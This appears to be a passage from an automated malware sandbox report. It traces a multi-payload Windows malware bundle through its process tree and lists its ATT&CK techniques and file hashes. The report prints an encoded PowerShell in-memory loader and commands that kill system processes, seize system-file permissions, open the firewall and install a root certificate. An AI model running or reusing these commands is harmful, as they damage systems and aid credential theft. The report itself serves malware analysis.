-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\the.exethe.exe3⤵
- Executes dropped EXE
PID:2744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\wimloader.dllwimloader.dll3⤵
- Executes dropped EXE
PID:584 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_c3e8deeb-cdbc-4e7d-bb33-e403c7075a52\caller.cmd" "4⤵
- System Location Discovery: System Language Discovery
PID:2400
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\ac3.exeac3.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:3276
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\shell1.ps1"3⤵
- System Location Discovery: System Language Discovery
PID:2912
-
-
C:\Windows\SysWOW64\PING.EXEping trustsentry.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2688
-
-
C:\Windows\SysWOW64\PING.EXEping ya.ru -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3844
-
-
C:\Windows\SysWOW64\PING.EXEping tria.ge -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1776
-
-
C:\Windows\SysWOW64\xcopy.exexcopy bloatware C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:924
-
-
C:\Windows\SysWOW64\xcopy.exexcopy beastify.url C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2072
-
-
C:\Windows\SysWOW64\xcopy.exexcopy shell1.ps1 C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:2076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\explorer.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3456
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\System32\dwm.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3832
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\System32\dwm.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4048
-
-
C:\Windows\SysWOW64\xcopy.exexcopy xcer.cer C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1800
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:988
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:3524
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\freebobux.exefreebobux.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1736 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7465.tmp\freebobux.bat""4⤵
- Loads dropped DLL
PID:1716 -
C:\Users\Admin\AppData\Local\Temp\7465.tmp\CLWCP.execlwcp c:\temp\bg.bmp5⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:932
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7465.tmp\x.vbs"5⤵PID:3748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\SolaraBootstraper.exeSolaraBootstraper.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2568 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"4⤵
- Executes dropped EXE
PID:3640
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵
- Executes dropped EXE
PID:2236
-
-
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
PID:1856 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2600
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ctfmon.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1516
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\wim.dllwim.dll3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2596 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\wim_dfa8629f-ee0a-403e-9e00-692145d56147\load.cmd" "4⤵PID:2556
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_dfa8629f-ee0a-403e-9e00-692145d56147\cringe.mp4"5⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2656
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_dfa8629f-ee0a-403e-9e00-692145d56147\lol.ini5⤵
- System Location Discovery: System Language Discovery
PID:2932
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_dfa8629f-ee0a-403e-9e00-692145d56147\mailgooglecom.json5⤵
- Modifies registry class
PID:3328
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_dfa8629f-ee0a-403e-9e00-692145d56147\CLOCK.py5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:684
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\xcer.cer3⤵
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:1104
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\f3cb220f1aaa32ca310586e5f62dcab1.exef3cb220f1aaa32ca310586e5f62dcab1.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2588
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1608
-
-
C:\Windows\SysWOW64\xcopy.exexcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2176
-
-
C:\Windows\SysWOW64\regedit.exeregedit3⤵
- Runs regedit.exe
PID:2832
-
-
C:\Windows\SysWOW64\xcopy.exexcopy C:\Windows\WinSxS C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3812
-
-
C:\Windows\SysWOW64\xcopy.exexcopy regmess.exe C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2300
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\jaffa.exejaffa.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2052 -
C:\Windows\SysWOW64\dxwbwewlne.exedxwbwewlne.exe4⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Enumerates connected drives
- Modifies WinLogon
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3480 -
C:\Windows\SysWOW64\zyrnalmo.exeC:\Windows\system32\zyrnalmo.exe5⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:1376
-
-
-
C:\Windows\SysWOW64\eususxtzrybfydh.exeeususxtzrybfydh.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1872
-
-
C:\Windows\SysWOW64\zyrnalmo.exezyrnalmo.exe4⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3708
-
-
C:\Windows\SysWOW64\yjpiisywuzrev.exeyjpiisywuzrev.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3332
-
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Windows\mydoc.rtf"4⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1192 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122885⤵PID:3076
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\helper.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:2456
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\jkka.exejkka.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1908 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"4⤵
- Drops startup file
- Loads dropped DLL
- NTFS ADS
PID:832 -
C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:988 -
C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:3636
-
-
C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe" 2 3636 2595983156⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1040
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fontdrvhost.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1864
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\selfaware.exeselfaware.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1608 -
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\selfaware.exeselfaware.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3304 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\e542afb4-8aea-487a-8254-0c50560ecd16" /deny *S-1-1-0:(OI)(CI)(DE,DC)5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1820
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\selfaware.exe"C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\selfaware.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:292 -
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\selfaware.exe"C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\selfaware.exe" --Admin IsNotAutoStart IsNotTask6⤵
- Executes dropped EXE
PID:1340
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
PID:3844
-
-
-
C:\Users\Admin\AppData\Local\Temp\12f124b4-5900-43f7-b026-35899fa2ab53\packer.exe"C:\Users\Admin\AppData\Local\Temp\12f124b4-5900-43f7-b026-35899fa2ab53\packer.exe" "C:\Users\Admin\AppData\Local\Temp\12f124b4-5900-43f7-b026-35899fa2ab53\unpacker.exe" "C:\Users\Admin\AppData\Local\Temp\vir.exe" "!main.cmd" "C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d" "" True True False 0 -repack2⤵
- Executes dropped EXE
PID:1488
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2548 CREDAT:275457 /prefetch:22⤵
- Manipulates Digital Signatures
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:2964
-
-
C:\Windows\system32\efsui.exeefsui.exe /efs /keybackup1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2540
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵PID:3196
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{062e05c9-4512-2442-c905-2e0626fca628}\droidcam.inf" "9" "6e67c8bbf" "00000000000005D8" "WinSta0\Default" "00000000000005DC" "208" "c:\program files (x86)\droidcam\lib"1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2732 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\system32\pnpui.dll,InstallSecurityPromptRunDllW 20 Global\{5edb0c60-46f9-4baf-3079-9a4ed778533c} Global\{13a94357-7c2a-4518-3702-ad2d8cee2805} C:\Windows\System32\DriverStore\Temp\{69221814-16d5-1d46-51fb-ed5008d68c70}\droidcam.inf C:\Windows\System32\DriverStore\Temp\{69221814-16d5-1d46-51fb-ed5008d68c70}\droidcam.cat2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\MEDIA\0000" "C:\Windows\INF\oem2.inf" "droidcam.inf:MicrosoftDS.NTAMD64:DroidCam_PCMEX:1.0.0.1:droidcam" "6e67c8bbf" "00000000000005D8" "0000000000000604" "0000000000000608"1⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5c81⤵PID:3436
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Component Object Model Hijacking
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Component Object Model Hijacking
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
9Obfuscated Files or Information
1Command Obfuscation
1Subvert Trust Controls
2Install Root Certificate
1SIP and Trust Provider Hijacking
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Password Policy Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
5Remote System Discovery
1System Information Discovery
6System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
942KB
MD5f8c12fc1b20887fdb70c7f02f0d7bfb3
SHA128d18fd281e17c919f81eda3a2f0d8765f57049f
SHA256082f5c3fd2fd80505cbd4dbdbb7c50e83c2e81f033a04ea53832dbf0a3fc4933
SHA51297c5d158abb119e076ace4b1398de19029b5d44566d9a293811bf7edbb0db120354cc396aed72bf62766799dc5db266d4b2ee7aee3ffc2818d8be77a4665ad2f
-
Filesize
87KB
MD5de2a97a1e50afa4fec443a8930606ddf
SHA14133434c37472ab14443704dd9ad8e8546f3098f
SHA2565cf6e6e22cba884b20da6cf701546613792c15f30d4c27273a432fb185f29416
SHA512d25e638a7925d0be5bbb081f5edda506603252916c3d3868d2bcdcc31484547efb893130a6b5eccc781bfece702c59d34fe67a84a48e379916fc15568adcdc49
-
Filesize
254B
MD5cfaaa32cc4fd40e36512f768bd75a0e1
SHA16ed1063ab547f65aace2fd98713df6d29834c19a
SHA256d7b86a37b02fed2794904cb28c0fa64a1e0d2218fab608250c8531c1b9ddc439
SHA512d2fe74d8e10b6378c48b72c9e22515a31592859d1f725bc86d9e48fcce9f7421e7afe477feb1c2041ff46b2620ad4244c887c670dc25e8acd70029e2166a0a93
-
Filesize
2.9MB
MD56bb0ab3bcd076a01605f291b23ac11ba
SHA1c486e244a5458cb759b35c12b342a33230b19cdf
SHA256959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908
SHA512d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621
-
Filesize
579B
MD5f55da450a5fb287e1e0f0dcc965756ca
SHA17e04de896a3e666d00e687d33ffad93be83d349e
SHA25631ad6648f8104138c738f39ea4320133393e3a18cc02296ef97c2ac9ef6731d0
SHA51219bd9a319dfdaad7c13a6b085e51c67c0f9cb1eb4babc4c2b5cdf921c13002ca324e62dfa05f344e340d0d100aa4d6fac0683552162ccc7c0321a8d146da0630
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6B2043001D270792DFFD725518EAFE2C
Filesize252B
MD596d940ba434815373379dc3df3318177
SHA1d1cb43debe897c441e92c1726812ea5561f72081
SHA256a02a3aade748b7f10ea0a4c81a3136f120a4813a4b206c31ebe65f2e91b4e7d0
SHA512f6b2e3bc0798cd812032c4870e0ec43ac715ae4f1bab993bd0a93c1a4755c951e31deb41ea860c62dd718526804f19a75944f568605433240798bed779c89c22
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5d8b42bb5e61e873aae0a771a9f61d4d8
SHA1743f4e9ce42cbf89c7f7db9043c348304d0a3855
SHA2560b9297d5a091f845248694ae6a4e86c1ab3e3369eeffbae10ff33ad3bbc1d875
SHA5129ae88436c50fc5d147280f92ec2014a7e6293cf2b71af04aed0b50ae687bd0123d0037960787d2901bf356bd389785310cd923908119f7eb50433f6c175af4a1
-
